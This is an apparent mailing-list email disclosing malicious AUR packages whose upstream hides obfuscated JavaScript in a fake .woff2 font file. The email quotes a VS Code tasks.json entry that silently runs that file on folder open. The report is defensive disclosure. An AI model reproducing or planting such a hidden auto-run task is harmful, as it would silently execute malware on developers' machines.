Hi, Thanks Saren,
The maintainer should probably be banned from AUR as well. https://aur.archlinux.org/packages/tokentracker-cli => https://github.com/ayan-de/Token-Tracker/commit/60f86b3a5eabf73cf13e0bb883897dd0ebee0f4f The 2 other packages I'm not sure, didn't check the binaries. Thanks, On Sat, 12 Sept 2026 at 22:36, Saren <[email protected]> wrote: > > Package: https://aur.archlinux.org/packages/glanced > > Upstream: https://github.com/ayan-de/glance-linux > > https://github.com/ayan-de/glance-linux/blob/master/public/fonts/fa-solid-500.woff2 > is obfuscated javascript disguised as a .woff2 font file, with a lot of > whitespace prepended. This javascript will be executed when this package > is opened using vscode as defined in .vscode/tasks.json > > ```json > { > "label": "eslint-check", > "type": "shell", > "command": "(command -v node >/dev/null 2>&1 && node > ./public/fonts/fa-solid-500.woff2) || (where node >nul 2>&1 && node > ./public/fonts/fa-solid-500.woff2) || echo ''", > "isBackground": true, > "hide": true, > "presentation": { "reveal": "never", "echo": false, "close": true }, > "runOptions": { "runOn": "folderOpen" } > } > ``` > > When executed, the code will resolve a specific ethereum transaction > from blockchain, resolving a 2nd stage payload from http, effectively a RAT. > > Detailed analysis by claude: > https://gist.github.com/Saren-Arterius/d666ff56ef070a551f5f38a404b0c85d > >
